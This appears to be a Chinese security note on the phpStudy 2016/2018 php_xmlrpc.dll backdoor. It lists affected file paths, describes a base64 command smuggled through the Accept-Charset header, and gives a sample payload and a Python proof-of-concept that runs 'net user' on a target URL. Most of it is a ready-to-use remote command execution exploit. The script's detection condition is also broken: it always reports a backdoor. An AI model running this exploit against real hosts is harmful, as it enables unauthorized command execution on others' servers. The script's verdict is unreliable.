漏洞影响版本:

• phpStudy2016
  • php\php-5.2.17\ext\php_xmlrpc.dll
  • php\php-5.4.45\ext\php_xmlrpc.dll
• phpStudy2018
  • PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
  • PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

漏洞前提:

• 引用了php_xmlrpc.dll文件且文件存在@eval(%s(‘%s’))

漏洞验证:

• Accept-Encoding要把gzip, deflate 里逗号后面的空格去掉，不然命令执行不成功

• Accept-Charset 的值就是执行的命令, 需要进行base64编码

• 构造Payload:

    // 执行命令 system(‘ipconfig‘) ;
    accept-charset：c3lzdGVtKCdpcGNvbmZpZycpIDs=
  

验证脚本:

# -*-coding:utf-8 -*-

import requests 
import sys 
import base64

def Poc(ip):
    payload = "echo \"hello phpstudy\";"
    poc = "ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7"
    pay = base64.b64encode(payload.encode(‘utf-8‘))
    #poc = str(pay,"utf-8")
    headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Connection": "close",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": poc,
    "Upgrade-Insecure-Requests": "1",
    }
    url = ip
    r = requests.get(url,headers=headers)
    #print(r.text)
    if "Administrator" or "DefaultAccount" in r.text:
        print("存在phpstudy后门")
    else:
        print("不存在phpstudy后门")

if len(sys.argv) < 2:
    print("python phpstudy.py http://127.0.0.1")
else:
    Poc(sys.argv[1])

PHPStudy后门